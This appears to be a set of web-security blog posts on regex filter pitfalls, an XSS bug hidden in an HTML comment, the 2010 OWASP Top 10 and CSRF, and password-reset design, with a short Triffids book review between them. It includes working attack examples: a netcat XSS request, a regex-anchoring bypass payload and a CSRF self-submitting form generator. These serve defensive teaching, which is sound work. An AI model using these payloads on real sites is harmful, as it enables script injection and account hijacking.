Input validation filters often require an understanding of a data type’s grammar. Sometimes this is simple, such as a five-digit zip code. More complex cases, such as email addresses and URIs, require that the input string be parsed before pattern matching is applied.

The previous indexOf string example failed because it doesn’t actually parse the referrer’s URI; it just looks for the presence of a string. The regex pattern in the example was superior because it at least tried to understand the URI grammar by matching content between the URI’s scheme (http or https) and the first slash (/).1

A good security filter must understand the context of the pattern to be matched. The improved referrer check is shown below. Notice that the get_hostname_from_url function now uses a regex to extract the host name from the referrer’s URI and the string comparison ensures the host name either exactly matches “walmart.com” or ends with “.walmart.com”. (You could quibble that the regex in get_hostname_from_url isn’t anchored, but in this case the pattern works because it’s not possible to smuggle malicious content inside the URI’s scheme. The pattern would fail if it returned the last match instead of the first match. And, yes, the typo in the comment in the killFrames function is in the original JavaScript.)

function killFrames() {
  if(top.location != location) {
    if(document.referrer) {
      var referrerHostname = get_hostname_from_url(document.referrer);
      var strLength = referrerHostname.length;
      if((strLength == 11)
         && (referrerHostname != "walmart.com")) { // to take care of url - length of "walmart.com" string is 11.
        top.location.replace(document.location.href);
      }
      else if(strLength != 11
              && referrerHostname.substring(referrerHostname.length - 12) != ".walmart.com") { // length of ".walmart.com" string is 12.
        top.location.replace(document.location.href);
      }
    }
  }
}

function get_hostname_from_url(url) {
  return url.match(/:\/\/(.[^/?]+)/)[1];
}


Regexes and string matching functions are ubiquitous throughout web applications. If you’re implementing security filters with these functions, keep these points in mind:

Normalize the character set. Ensure the string functions and regex patterns match the character encoding, e.g. multi-byte string functions for multi-byte sequences.

Always match the entire input string. Anchor patterns to the start (^) and end ($) of input strings. If you expect input strings to include multiple lines, understand how the multiline (?m) and single line (?s) flags will affect the pattern – if you’re not sure, treat the input as a single line. Where appropriate to the context, test the results of string matching functions to determine whether the match occurred at the beginning, within, or at the end of a string.

Prefer a positive security model over a negative one. Define what you want to explicitly accept rather than what to reject.

Allow content that you expect to receive and deny anything that doesn’t fit. Allow list filters should be as strict as possible to avoid incorrectly matching malicious content. If you go the route of deny listing content, make the patterns as lenient as possible to better match unexpected scenarios – an attacker may have an encoding technique or JavaScript trick you’ve never heard of.

Consider a parser instead of a regex. If you want to match a URI attribute, make sure your pattern extracts the right value. URIs can be complex. If you’re trying to use regexes to parse HTML content…good luck.

Don’t shy away from regexes because their syntax looks daunting, just remember to test your patterns against a wide array of malicious and valid input strings.
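To illustrate the anchoring advice above in JavaScript: by default $ anchors the true end of the input, while the m flag lets ^ and $ match at every line break – which can quietly reopen the hole:

```javascript
const strict = /^\d{5}$/;   // default: ^ and $ anchor the whole input
const multi  = /^\d{5}$/m;  // m flag: ^ and $ also match at line breaks

const payload = '12345\n<script>alert(0x42)</script>';

console.log(strict.test(payload)); // false – trailing payload rejected
console.log(multi.test(payload));  // true  – the first line alone satisfies the pattern
```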

  1. Technically, the pattern should match the host portion of the URI’s authority. Check out RFC 3986 for specifics, especially the regexes mentioned in Appendix B. 

At about this time...

“When a day that you happen to know is Wednesday starts off by sounding like Sunday, there is something seriously wrong somewhere.”

Bill Masen’s day only worsens as he tries to survive the apocalyptic onslaught of mobile, venomous plants.
John Wyndham’s The Day of the Triffids doesn’t feel like an outdated menace even though the book was published in 1951. Furthermore, the central character’s initial condition serves as an excellent hook that gives both a brief history of the triffids and underpins the high tension with which the book starts off. Where Cormac McCarthy’s The Road focuses on the harshness of personal survival and meaning after an apocalypse, Triffids considers the ways a society might try to emerge from one.

The 1981 BBC adaptation stays very close to the book’s plot and pacing. Read the book first, as the time-capsule aspect of the mini-series might distract you – 80’s hair styles, control panels, and lens flares. If you’ve been devoted to Doctor Who since the Tom Baker era (or before), you’ll feel right at home.

Is a vuln without a useful exploit still a vuln?

Here’s a case where a page has one of the simplest types of XSS vulnerabilities: A server echoes the querystring verbatim in the HTTP response. The payload shows up inside an HTML comment labeled “Request Query String”. The site’s developers claim the comment prevents XSS because browsers will not execute the JavaScript, as below:

<!-- <script>not gonna' happen</script> -->

One exploit technique would be to terminate the comment opener with “ -->” (space dash dash greater-than). Use netcat to make the raw HTTP request (for some reason, though likely related to the space, the server doubles the payload1):

$ echo -e "GET /nexistepas.cgi? --><script></script> HTTP/1.0\r\nHost: web.site\r\n" | nc web.site 80 | tee response.html
<!-- === Request URI: /abc/def/error/404.jsp -->
<!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false& --><script></script> --><script></script> -->
<!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp -->

You can confirm this works by viewing the HTML source in Mozilla to see its syntax highlighting pick up the tags (yes, you could just as easily pop an alert window).


The server is clearly vulnerable to XSS because it renders the exact payload. The HTML comments were a poor countermeasure because they could be easily closed by including a few extra characters in the payload. This also shows why I prefer the term HTML injection since it describes the underlying effect more accurately.

However, there’s a major problem of effective exploitability: The attack uses illegal HTTP syntax.2 Though the payload works when sent with netcat, a browser applies URL encoding to the payload’s important characters, thereby rendering it ineffective because the payload loses the literal characters necessary to modify the HTML:
<!-- === Request URI: /abc/def/error/404.jsp -->
<!-- === Request Query String: pageType=error&emptyPos=100&isInSecureMode=false&%20--%3e%3cscript%3e%3c/script%3e -->
<!-- === Include URI: /abc/def/cmsTemplates/def_headerInclude_1_v3.jsp -->

I tried Mozilla’s XMLHttpRequest object to see if it might subvert the encoding issue, but didn’t have any luck. Browsers are smart enough to apply URL encoding for all requests, thus defeating this possible trick:

var req = new XMLHttpRequest();
req.open('GET', '/nexistepas.cgi? --><scri' + 'pt></s' + 'cript>', false);
req.send(null);

The developers are correct to claim that HTML comments prevent <script> tags from being executed, but that has nothing to do with protecting this web site. It’s like saying you can escape Daleks by using the stairs; they’ll just level the building.


The page’s only protection comes from the fact that browsers will always encode the space character. If the page were to decode percent-encoded characters or there were a way to make the raw request with a space, then the page would be trivially exploited. The real solution for this vulnerability is to apply HTML encoding or percent encoding to the querystring when it’s written to the page.
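A minimal sketch of that solution – HTML-encode the querystring before writing it into the page (a hypothetical helper, not the site’s actual code):

```javascript
// Replace the characters that let a payload break out of its HTML context.
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;');
}

// The comment-breaking payload is rendered inert:
console.log(htmlEncode(' --><script></script>'));
// " --&gt;&lt;script&gt;&lt;/script&gt;"
```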

Set aside whether the vulnerability is exploitable or not. The 404 message in this situation clearly has a bug. Bugs should be fixed. The time spent arguing over risks, threats, and feasibility far outweighs the time required to create a patch. If the effort of pushing out a few lines of code cripples your web development process, then it’s probably a better idea to put more effort into figuring out why the process is broken. Notice that I didn’t mention the timeline for the patch. The release cycle might necessitate a few days or a few weeks to validate the change. On the other hand, if minor changes cause panic about uptime and require months to test and apply, then you don’t have a good web development process – something far more hazardous to the site’s long-term security.

  1. Weird behavior like this is always interesting. Why would the querystring be repeated? What implications does this have for other types of attacks? 

  2. Section 5.1 of RFC 2616 specifies the format of a request line must be as follows (SP indicates a single space character): Request-Line = Method SP Request-URI SP HTTP-Version CRLF. Including spurious space characters within the request line might elicit errors from the web server and is a worthy test case, but you’ll be hard-pressed to convince a standards-conformant browser to include a space in the URI. 

30% of the 2010 OWASP Top 10 not common, only 1 hard to detect


One curious point about the new 2010 OWASP Top 10 Application Security Risks is that 30% of them aren’t even common. The “Weakness Prevalence” for each of Insecure Cryptographic Storage (A7), Failure to Restrict URL Access (A8), and Unvalidated Redirects and Forwards (A10) is rated uncommon. That doesn’t mean that an uncommon risk can’t be a critical one; these three points highlight the challenge of producing an unbiased list and conveying risk.

Risk is complex and difficult to quantify. The OWASP Top 10 includes a What’s My Risk? section that provides guidance on how to interpret the list. The list is influenced by the experience of people who perform penetration tests, code reviews, or conduct research on web security.

The Top 10 rates Insecure Cryptographic Storage (A7) with an uncommon prevalence and difficult to detect. One of the reasons it’s hard to detect is that back-end storage schemes can’t be reviewed by blackbox scanners (i.e. web scanners) nor can source code scanners point out these problems other than by indicating misuse of a language’s crypto functions. So, one interpretation is that insecure crypto is uncommon only because more people haven’t discovered or revealed such problems. Yet not salting a password hash is one of the most egregious mistakes a web app developer can make and one of the easier problems to fix – the practice of salting password hashes has been around since Unix epoch time was in single digits.

It’s also interesting that insecure crypto is the only one on the list that’s rated difficult to detect. On the other hand, Cross-Site Scripting (A2) is “very widespread” and “easy” to detect. But maybe it’s very widespread because it’s so trivial to find. People might simply focus on searching for vulns that require minimal tools and skill to discover. Alternatively, XSS might be very widespread because it’s not easy to find in a way that scales with development or keeps up with the complexity of web apps. (Of course, this assumes that devs are looking for it in the first place.) XSS tends to be easy for manual testing, whereas scanners need to effectively crawl an app before they can go through their own detection techniques.

Broken Authentication and Session Management (A3) covers brute force attacks against login pages. It’s an item whose risk is too-often demonstrated by real-world attacks. In 2010 the Apache Foundation suffered an attack that relied on brute forcing a password. (Apache’s network had a similar password-driven intrusion in 2001. These events are mentioned because of the clarity of their postmortems, not to insinuate that the org is inherently insecure.) In 2009 Twitter provided happiness to another password guesser.

Knowing the password to an account is the best way to pilfer a user’s data and gain unauthorized access to a site. The only markers for an attacker using valid credentials are behavioral patterns – time of day the account was accessed, duration of activity, geographic source of the connection, etc. The attacker doesn’t have to use any malicious characters or techniques that could trigger XSS or SQL injection countermeasures.

The impact of a compromised password is similar to how CSRF (A5) works. The nature of a CSRF attack is to force a victim’s browser to make a request to the target app using the context of the victim’s authenticated session in order to perform some action within the app. For example, a CSRF attack might change the victim’s password to a value chosen by the attacker, or update the victim’s email address to one owned by the attacker.

By design, browsers make many requests without direct interaction from a user (such as loading images, CSS, JavaScript, and iframes). CSRF requires the victim’s browser to visit a booby-trapped page, but doesn’t require the victim to click anything. The target web app neither sees the attacker’s traffic nor even suspects the attacker’s activity because all of the interaction occurs between the victim’s browser and the app.
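A sketch of how small the booby-trapped page can be – this builds the kind of self-submitting form an attacker might serve (the target endpoint, field name, and domains are hypothetical):

```javascript
// Return markup that, when loaded by the victim's browser, silently POSTs
// to the target app using the victim's own session cookies.
function csrfPage(action, field, value) {
  return '<form method="POST" action="' + action + '">' +
         '<input type="hidden" name="' + field + '" value="' + value + '">' +
         '</form>' +
         '<script>document.forms[0].submit()</scr' + 'ipt>';
}

const page = csrfPage('https://app.example/email/update', 'email', 'agatha@evil.lair');
console.log(page.length > 0); // true
```

The victim never clicks anything; loading the page is enough, and the response never needs to be read, which is why the Same Origin Policy doesn’t stop it.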

CSRF serves as a good example of the changing nature of the web security industry. CSRF vulnerabilities have existed as long as the web. The attack takes advantage of the fundamental nature of HTML and HTTP whereby browsers automatically load certain types of resources. Importantly, the attack just needs to build a request. It doesn’t need to read the response, hence it isn’t inhibited by the Same Origin Policy.

CSRF hopped onto the Top 10 list’s revision in 2007, three years after the list’s first appearance. It’s doubtful that CSRF vulnerabilities were any more or less prevalent over that three-year period (or even before 2000). Its inclusion was a nod to having a better understanding and appreciation of the risk associated with the vuln. And it’s a risk that’s likely to increase when the pool of victims can be measured in the hundreds of millions rather than the hundreds of thousands.

This vuln also highlights an observation bias of security researchers. Now that CSRF is in vogue, people start to look for it everywhere. Security conferences get more presentations about advanced ways to exploit the vulnerability, even though real-world attackers seem fine with the returns on guessing passwords, seeding web pages with malware, and phishing. Take a look at HTML injection (what everyone else calls XSS): injecting script tags into a web page via an unchecked parameter dates back to the beginning of the web.

Before you shrug off this discussion of CSRF as hand waving with comments like, “But I could hack site Foo by doing Bar and then make lots of money,” consider what you’re arguing: A knowledgeable or dedicated attacker will find a useful exploit. Risk may include many components, including Threat Agents (to use the Top 10’s term). Risk increases under a targeted attack – someone actively looking to compromise the app or its users’ data. If you want to add an “Exploitability” metric to your risk calculation, keep in mind that ease of exploitability is often related to the threat agent and tends to be a step function: It might be hard to figure out the exploit in the first place, but anyone can run a 42-line Python script that automates the attack.

This is why the Top 10 list should be a starting point to defining security practices for your web site, but it shouldn’t be the end of the road. Even the OWASP site admonishes readers to use the list for awareness rather than policy. So, if you’ve been worried about information leakage and improper error handling since 2007 don’t think the problem has disappeared because it’s not on the list in 2010.

The alien concept of password security

A post on Stack Overflow1 seeks advice on the relative security between implementing a password reset mechanism that emails a temporary link vs. one that emails a temporary password. The question brings to mind some issues addressed in Chapter 5: Breaking Authentication Schemes of The Book. Stack Overflow questions typically attract high quality answers, which is a testament to the site’s knowledgeable readership and reputation system. Responses to this particular post didn’t fail.

Rather than retread the answers, let’s consider the underlying implication behind the question: it can be acceptable to send passwords via email.

Don’t do it. Don’t give users the expectation that passwords might be sent via email. Doing so is unnecessary and establishes a dangerous practice as possibly acceptable. If the site ever sends a password to a user, then the user might be conditioned to communicate in the other direction. An email purportedly from the site’s administrators might ask for the user’s password to “verify the account is active”, “prevent the account from being terminated”, or “restore information”. The email need not ask for a direct response. It may be an indirect prompt for the password using cautionary, concerned language that nevertheless sends the victim to a spoofed login page.

Site administrators will not elicit passwords via email or any other means. Sites won’t ask for passwords except at authentication barriers. Sites shouldn’t send passwords – however temporary they may be.

“Newt. My name’s Newt.”

Passwords – shared secrets ostensibly known only to the user and the web site – are a necessary evil of authentication. The password proves a user’s identity to a web site under the assumption that only the person who logs in as Newt, for example, knows that the account’s corresponding password is rebecca.

A password’s importance to web security has a frustratingly indirect relationship to the amount of control a site is able to exert over its protection. Users must be trusted not only to use hard-to-guess words or phrases, but also not to share the password or otherwise actively divulge it through accident or ignorance. Only the luckiest of potential victims will click an emailed link and be brought to a friendly page.


“That’s it man, game over man, game over!”

Password reuse among sites poses another serious risk. The theft of a user’s credentials (email address and password) for a low-value site might seem relatively innocuous, but what if they’re the same credentials used for the user’s bank or shopping accounts? Even worse, what if the password matches the one for the user’s Gmail, Hotmail, or Yahoo account? In that case: “Nuke the entire site from orbit. It’s the only way to be sure.”

“Seventeen days? Hey man, I don’t wanna rain on your parade, but we’re not gonna last seventeen hours!”

Use random, temporary links for password reset mechanisms via email. By this point you should be sufficiently warned off of the alternative of emailing temporary passwords. An obstinate few might choose to stick with passwords, arguing that there’s no difference between the two once they hit the unencrypted realm of email.

Instead, use a forward-thinking solution that tries to secure the entire reset process:

  • Maintain the original password until the user changes it. Perhaps they’ll remember it anyway. This also prevents a mini denial of service where attackers force users to change their passwords.
  • Use a strong pseudo-random number generator to minimize the chance of success of brute force attacks guessing the link.
  • Expire the link after a short period of time, perhaps in minutes or hours. This narrows the window of opportunity for brute force attacks that attempt to guess links. It’s no good to let an attacker initiate a password reset on a Friday evening and have a complete weekend to brute force links until the victim notices the email on a Monday morning.

“Maybe we got ‘em demoralized.”

For those of you out there who visit web sites rather than create them, there’s one rule you should never ignore. If the site’s password recovery mechanism emails you the original password for your account, then stop using the site. Period. Full stop. Should you be forced to use the site under threat of violence or peer pressure, whichever is worse, at the very least choose a password that isn’t shared with any other account. Storing unencrypted passwords is lazy, bad security design, and a liability.

Quotes from the movie Aliens. If you didn’t already know that, go watch it now. It’s worth it. See you in about two hours.

  1. Huzzah! A site name that doesn’t succumb to stripping spaces, prefixing an ‘e’ or ‘i’, or using some vapid, made-up word only because it consists of four or five letters!